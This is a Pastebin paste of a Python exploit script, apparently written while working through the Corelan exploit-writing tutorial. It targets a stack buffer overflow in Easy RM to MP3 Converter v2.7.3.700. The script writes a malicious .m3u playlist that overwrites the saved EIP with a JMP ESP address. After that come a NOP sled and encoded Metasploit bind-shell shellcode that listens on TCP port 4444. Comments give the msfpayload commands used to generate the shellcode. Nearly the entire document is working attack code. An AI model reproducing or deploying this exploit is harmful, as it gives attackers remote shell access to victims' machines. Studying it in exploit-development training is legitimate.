SHARE
TWEET

exploi_5M7X_easyRM2MP3.py

a guest Sep 2nd, 2010 456 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. # need the struct-libs for little-endian packing
  4. import struct
  5.  
  6. # some fancy ascii-stuff (as adviced in corelans tutorial ;P)
  7. print """                        ______                      ____
  8.                       /     /__ ___       ____    /   /___
  9.               __ ____/     //  /  _\______\_  \ /   //  /_
  10.             __\ \\    .____//      \_____   /   \/   //  //
  11.              o/  0\____  \/  \ /   \__    /\      /0  /o
  12.            _//__//_______/____Y_____\   / /___/\ \\__\\_
  13.       <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>"""
  14.  
  15. print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-"
  16. print "\n corelan tutorial part1 - smtx.2010"
  17. print " greets 2 back-track-community and CORELAN"
  18.  
  19. # building the buffer 26059 bytes till eip (depends on the path where the m3u is stored)
  20. preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4)  # pre buffer to reach saved EIP
  21.  
  22. # overwrite saved EIP with a JMP-ESP
  23. # Address=01D0F23A
  24. # Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll)
  25. eip = struct.pack('<i', 0x1D0F23A)     # eip
  26.  
  27. # this is to stuff another 4 bytes because of the "calling"-conventions mentioned
  28. # here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1
  29. # and there -> http://en.wikipedia.org/wiki/X86_calling_conventions
  30. # there are 4 bytes between ESP and our shellcode so we need this to make
  31. # ESP pointing onto your shellcode
  32. pad = 'FUCK'
  33.  
  34. # i make a little nopsled just to be sure of "weird" stuff to happen
  35. nopsled = '\x90' * 10
  36.  
  37. # BADCAHRS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR
  38. # size for shellcode is 3937 (not tested) at least enough for what we want
  39. # testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
  40. # this is a bind-shell-code listening on TCP-Port:4444
  41. # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
  42. shcode = (
  43. "\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1"
  44. "\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2"
  45. "\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e"
  46. "\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f"
  47. "\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1"
  48. "\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71"
  49. "\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81"
  50. "\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed"
  51. "\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f"
  52. "\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a"
  53. "\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd"
  54. "\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18"
  55. "\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3"
  56. "\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6"
  57. "\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a"
  58. "\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12"
  59. "\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34"
  60. "\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c"
  61. "\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c"
  62. "\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e"
  63. "\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67"
  64. "\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79"
  65. "\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd"
  66. "\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9"
  67. "\x47\x57\x93\xbf\x67\xc4\x94\x95\x62"
  68. )
  69.  
  70. trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) )
  71.  
  72. # lets put the attack-buffer together
  73. buffer = (preeip + eip + pad + nopsled + shcode + trigger)
  74.  
  75. # open and write evil buffer into m3u-playlist
  76. print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist"
  77. f = open('pwn_easyRM.m3u', 'w')
  78. f.write(buffer)
  79. f.close()
  80. print "   [x] done\n"
  81.  
  82. # eof
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top